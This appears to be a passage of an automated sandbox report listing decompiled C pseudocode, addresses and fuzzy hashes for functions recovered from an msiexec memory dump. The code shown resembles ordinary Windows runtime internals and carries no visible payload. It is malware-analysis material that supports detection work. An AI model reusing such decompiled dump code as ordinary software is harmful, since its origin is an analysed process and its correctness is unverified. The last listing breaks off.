                              Uniqueness Score: -1.00%

                              Function 04D1766D Relevance: .1, Instructions: 54COMMON
                              Download Yara Rule
                              C-Code - Quality: 94%
                              			E04D1766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E04D3F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E04D3F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L04D24620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                              0x04d17672
                              0x04d1767f
                              0x04d17689
                              0x04d176de
                              0x04d176de
                              0x04d1768b
                              0x04d17691
                              0x04d17693
                              0x04d17697
                              0x00000000
                              0x04d17699
                              0x04d176a8
                              0x00000000
                              0x04d176aa
                              0x04d176ad
                              0x04d176b1
                              0x00000000
                              0x04d176b3
                              0x04d176b3
                              0x04d176b5
                              0x04d176ba
                              0x04d176bc
                              0x04d176bc
                              0x04d176c0
                              0x00000000
                              0x04d176c2
                              0x04d176ce
                              0x04d176ce
                              0x04d176c0
                              0x04d176b1
                              0x04d176a8
                              0x04d17697
                              0x04d176d9

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                              • Instruction ID: ef28075fd9aa3184fb0efea356fc7ffc4e3d3d39dce10b6c6b6cd4bc643239ba
                              • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                              • Instruction Fuzzy Hash: A9017132701119BBD761EE5EDD41E5B76ADEB88760B240524FD48CB274DA30ED0187A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D9C450 Relevance: .1, Instructions: 53COMMON
                              Download Yara Rule
                              C-Code - Quality: 46%
                              			E04D9C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E04D49910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E04D495B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E04D495D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E04D495D0();
				return L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                              0x04d9c458
                              0x04d9c45d
                              0x04d9c466
                              0x04d9c468
                              0x04d9c469
                              0x04d9c46a
                              0x04d9c46b
                              0x04d9c46e
                              0x04d9c46f
                              0x04d9c471
                              0x04d9c476
                              0x04d9c476
                              0x04d9c47c
                              0x04d9c47e
                              0x04d9c480
                              0x04d9c480
                              0x04d9c483
                              0x04d9c484
                              0x04d9c486
                              0x04d9c488
                              0x04d9c48f
                              0x04d9c491
                              0x04d9c493
                              0x04d9c493
                              0x04d9c48f
                              0x04d9c498
                              0x04d9c49e
                              0x04d9c4ad
                              0x04d9c4ad
                              0x04d9c4b2
                              0x04d9c4b4
                              0x04d9c4cd

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                              • Instruction ID: 9d828e7af5aacaddfed7db467e23ddde74f18b37f5f0ac58e2b217dade385658
                              • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                              • Instruction Fuzzy Hash: 130180B2340545BFEB21AF65CC94E63BB6DFB94798F104525F11483560CB21BCA0CAB1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D09080 Relevance: .1, Instructions: 53COMMON
                              Download Yara Rule
                              C-Code - Quality: 69%
                              			E04D09080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x4df85ec;
				E04D22280(_t48, 0x4df85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E04D1FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x4df538c; // 0x305ca10
					if( *_t84 != 0x4df5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x4ddf6e8);
						E04D5D0E8(0x4df85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E04DD88F5(_t80, _t85, 0x4df5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x4df86c0; // 0x30507b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x4df86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E04D22280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E04DD88F5(0x4df85ec, _t85, 0x4df5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E04D4AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x4dfb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x4df84c0;
																			if(_t82 >=  *0x4df84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E04DD9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E04D0922A(_t99);
										_t64 = E04D27D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E04DD8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x4df86c0; // 0x30507b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x4df86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x4df86bc;
													_t87 = 0x4df86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E04D09240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x4df86c4;
												_t87 = 0x4df86c0;
												L27:
												E04D39B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E04D5D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x4df5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x4df538c = _t51;
						goto L6;
					}
				}
			}




















                              0x04d09082
                              0x04d09083
                              0x04d09084
                              0x04d09085
                              0x04d09087
                              0x04d09096
                              0x04d09098
                              0x04d09098
                              0x04d0909e
                              0x04d090a8
                              0x04d090e7
                              0x04d090e7
                              0x04d090aa
                              0x04d090b0
                              0x04d090b7
                              0x04d090bd
                              0x04d090dd
                              0x04d090e6
                              0x04d090bf
                              0x04d090bf
                              0x04d090c7
                              0x04d090cf
                              0x04d090f1
                              0x04d090f2
                              0x04d090f4
                              0x04d090f5
                              0x04d090f6
                              0x04d090f7
                              0x04d090f8
                              0x04d090f9
                              0x04d090fa
                              0x04d090fb
                              0x04d090fc
                              0x04d090fd
                              0x04d090fe
                              0x04d090ff
                              0x04d09100
                              0x04d09102
                              0x04d09107
                              0x04d0910c
                              0x04d09110
                              0x04d09113
                              0x04d09115
                              0x04d09136
                              0x04d0913f
                              0x04d09143
                              0x04d637e4
                              0x04d637e4
                              0x04d09117
                              0x04d09117
                              0x04d0911d
                              0x00000000
                              0x04d0911f
                              0x04d0911f
                              0x04d09125
                              0x00000000
                              0x04d09127
                              0x04d0912d
                              0x04d09130
                              0x04d09134
                              0x04d09158
                              0x04d0915d
                              0x04d09161
                              0x04d09168
                              0x04d63715
                              0x04d0916e
                              0x04d0916e
                              0x04d09175
                              0x04d09177
                              0x04d0917e
                              0x04d0917f
                              0x04d09182
                              0x04d09182
                              0x04d09187
                              0x04d09187
                              0x04d0918a
                              0x04d0918d
                              0x04d0918f
                              0x04d09192
                              0x04d09195
                              0x04d09198
                              0x04d09198
                              0x04d09198
                              0x04d0919a
                              0x00000000
                              0x00000000
                              0x04d6371f
                              0x04d63721
                              0x04d63727
                              0x04d6372f
                              0x04d63733
                              0x04d63735
                              0x04d63738
                              0x04d6373b
                              0x04d6373d
                              0x04d63740
                              0x00000000
                              0x04d63746
                              0x04d63746
                              0x04d63749
                              0x00000000
                              0x04d6374f
                              0x04d6374f
                              0x04d63751
                              0x04d63757
                              0x04d63759
                              0x04d6375c
                              0x04d6375c
                              0x04d6375e
                              0x04d6375e
                              0x04d63761
                              0x04d63764
                              0x00000000
                              0x00000000
                              0x04d63766
                              0x04d63768
                              0x04d637a3
                              0x04d637a3
                              0x04d637a5
                              0x04d637a7
                              0x04d637ad
                              0x04d637b0
                              0x04d637b2
                              0x04d637bc
                              0x04d637c2
                              0x04d637c2
                              0x04d637b2
                              0x04d09187
                              0x04d09187
                              0x04d0918a
                              0x04d0918d
                              0x04d0918f
                              0x04d09192
                              0x04d09195
                              0x00000000
                              0x04d09195
                              0x00000000
                              0x04d6376a
                              0x04d6376a
                              0x04d6376a
                              0x04d6376c
                              0x04d6376c
                              0x04d6376f
                              0x04d63775
                              0x00000000
                              0x00000000
                              0x04d63777
                              0x04d63779
                              0x04d63782
                              0x04d63787
                              0x04d63789
                              0x04d63790
                              0x04d63790
                              0x04d6378b
                              0x04d6378b
                              0x04d6378b
                              0x04d63792
                              0x04d63795
                              0x00000000
                              0x04d63795
                              0x00000000
                              0x04d63779
                              0x04d63798
                              0x00000000
                              0x04d63798
                              0x00000000
                              0x04d63768
                              0x04d6379b
                              0x04d6379b
                              0x04d63751
                              0x04d63749
                              0x00000000
                              0x04d63740
                              0x04d091a0
                              0x04d091a3
                              0x04d091a9
                              0x04d091b0
                              0x00000000
                              0x04d091b0
                              0x04d09187
                              0x04d091b4
                              0x04d091b4
                              0x04d091bb
                              0x04d091c0
                              0x04d091c5
                              0x04d091c7
                              0x04d637da
                              0x04d091cd
                              0x04d091cd
                              0x04d091cd
                              0x04d091d2
                              0x04d091d5
                              0x04d09239
                              0x04d09239
                              0x04d091d7
                              0x04d091db
                              0x04d091e1
                              0x04d091e7
                              0x04d091fd
                              0x04d09203
                              0x04d0921e
                              0x04d09223
                              0x00000000
                              0x04d09205
                              0x04d09205
                              0x04d09208
                              0x04d0920c
                              0x04d09214
                              0x04d09214
                              0x04d0920c
                              0x04d091e9
                              0x04d091e9
                              0x04d091ee
                              0x04d091f3
                              0x04d091f3
                              0x04d091f3
                              0x04d091e7
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d09134
                              0x04d09125
                              0x04d0911d
                              0x04d0914e
                              0x04d090d1
                              0x04d090d1
                              0x04d090d3
                              0x04d090d6
                              0x04d090d8
                              0x00000000
                              0x04d090d8
                              0x04d090cf

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fbc31b5233ae4efac103129706d9fb8462e3e5ce47e81805038f88adf20fb433
                              • Instruction ID: cdbdcd3f5b46254fd786989f2353fcd4564ee38d4e9d7b381dc1b8022e1c736b
                              • Opcode Fuzzy Hash: fbc31b5233ae4efac103129706d9fb8462e3e5ce47e81805038f88adf20fb433
                              • Instruction Fuzzy Hash: 1001D1B27012009FE7249F18E860B1177F9FB41325F2280A6E6059B792C374FC41CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DD4015 Relevance: .0, Instructions: 49COMMON
                              Download Yara Rule
                              C-Code - Quality: 86%
                              			E04DD4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E04D22280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E04D22280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x4df86ac);
					E04D0F900(0x4df86d4, _t28);
					E04D1FFB0(0x4df86ac, _t28, 0x4df86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E04D1FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                              0x04dd401a
                              0x04dd401e
                              0x04dd4023
                              0x04dd4028
                              0x04dd4029
                              0x04dd402b
                              0x04dd402f
                              0x04dd4043
                              0x04dd4046
                              0x04dd4051
                              0x04dd4057
                              0x04dd405f
                              0x04dd4062
                              0x04dd4067
                              0x04dd406f
                              0x04dd407c
                              0x04dd407c
                              0x04dd408c
                              0x04dd408c
                              0x04dd4097

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dde2ae60418ab2bb37c68a9d62546b396362a44d91977d3906fcf3df6b6983a9
                              • Instruction ID: af09dab68b9928f08534ef0aff30394bea5a6cc0fb7780adedaf43aa858703cc
                              • Opcode Fuzzy Hash: dde2ae60418ab2bb37c68a9d62546b396362a44d91977d3906fcf3df6b6983a9
                              • Instruction Fuzzy Hash: 3C017C723019557FE221AB69CE80E17B7ACFF59668B000629F60887A21CB64FC11CAF5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DC14FB Relevance: .0, Instructions: 48COMMON
                              Download Yara Rule
                              C-Code - Quality: 61%
                              			E04DC14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4dfd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04D4FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E04D27D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                              0x04dc14fb
                              0x04dc14fb
                              0x04dc150a
                              0x04dc1514
                              0x04dc1519
                              0x04dc151b
                              0x04dc1526
                              0x04dc152c
                              0x04dc1534
                              0x04dc1537
                              0x04dc153a
                              0x04dc1545
                              0x04dc1557
                              0x04dc1547
                              0x04dc1550
                              0x04dc1550
                              0x04dc1562
                              0x04dc1563
                              0x04dc1565
                              0x04dc156a
                              0x04dc157f

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9463061d8c59a3b4ca3b93754955aece18c854cee028164c279525eb6d267dfc
                              • Instruction ID: 257af120740d8978df470cd245576912cf9df2bcdb7ad6087250b079f721d634
                              • Opcode Fuzzy Hash: 9463061d8c59a3b4ca3b93754955aece18c854cee028164c279525eb6d267dfc
                              • Instruction Fuzzy Hash: 29017571A01258AFDB14DF69D846FAEB7B8EF44714F40405AF915EB381D674EE00CB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DC138A Relevance: .0, Instructions: 48COMMON
                              Download Yara Rule
                              C-Code - Quality: 61%
                              			E04DC138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x4dfd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E04D4FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E04D27D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                              0x04dc138a
                              0x04dc138a
                              0x04dc1399
                              0x04dc13a3
                              0x04dc13a8
                              0x04dc13aa
                              0x04dc13b5
                              0x04dc13bb
                              0x04dc13c3
                              0x04dc13c6
                              0x04dc13c9
                              0x04dc13d4
                              0x04dc13e6
                              0x04dc13d6
                              0x04dc13df
                              0x04dc13df
                              0x04dc13f1
                              0x04dc13f2
                              0x04dc13f4
                              0x04dc13f9
                              0x04dc140e

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1d544322febb4c7f1744d3ef57c8f214ce9b11e83c4a4e569bbb4cfa6da779bc
                              • Instruction ID: 3b960bbed05139c568819830a988cd29e5aeb8ebc47e7475c6101cb099c78cc1
                              • Opcode Fuzzy Hash: 1d544322febb4c7f1744d3ef57c8f214ce9b11e83c4a4e569bbb4cfa6da779bc
                              • Instruction Fuzzy Hash: 77014071A00218ABDB14DFA9D842FAEB7B8EF44714F40405AF945AB281D674EA01CB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D058EC Relevance: .0, Instructions: 47COMMON
                              Download Yara Rule
                              C-Code - Quality: 91%
                              			E04D058EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x4dfd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x4ce5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E04D05943() != 0 &&  *0x4df5320 > 5) {
					E04D87B5E( &_v44, _t27);
					_t22 =  &_v28;
					E04D87B5E( &_v28, _t28);
					_t11 = E04D87B9C(0x4df5320, 0x4cebf15,  &_v28, _t22, 4,  &_v76);
				}
				return E04D4B640(_t11, _t17, _v8 ^ _t29, 0x4cebf15, _t27, _t28);
			}















                              0x04d058fb
                              0x04d058fe
                              0x04d05906
                              0x04d0590a
                              0x04d0593c
                              0x04d0593c
                              0x04d0590c
                              0x04d0590c
                              0x04d05911
                              0x00000000
                              0x04d05913
                              0x04d05913
                              0x04d05913
                              0x04d05911
                              0x04d0591d
                              0x04d61035
                              0x04d6103c
                              0x04d6103f
                              0x04d61056
                              0x04d61056
                              0x04d0593b

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4726a51b56e473191dcc7ddf99f818fc4c8544bd6af05ba12c0513c891511ace
                              • Instruction ID: 2da50bb517afdee14e1840b6799020783fdd7d8f63be47ac9189585dd77b9c6c
                              • Opcode Fuzzy Hash: 4726a51b56e473191dcc7ddf99f818fc4c8544bd6af05ba12c0513c891511ace
                              • Instruction Fuzzy Hash: E7018471B00104ABEB14EA69FC21ABE77A9EB85224F9540699D05A7280EE30FD018A64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04DBFEC0 Relevance: .0, Instructions: 46COMMON
                              Download Yara Rule
                              C-Code - Quality: 59%
                              			E04DBFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x4dfd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E04D4FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E04D27D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04D4B640(E04D49AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                              0x04dbfec0
                              0x04dbfec0
                              0x04dbfecf
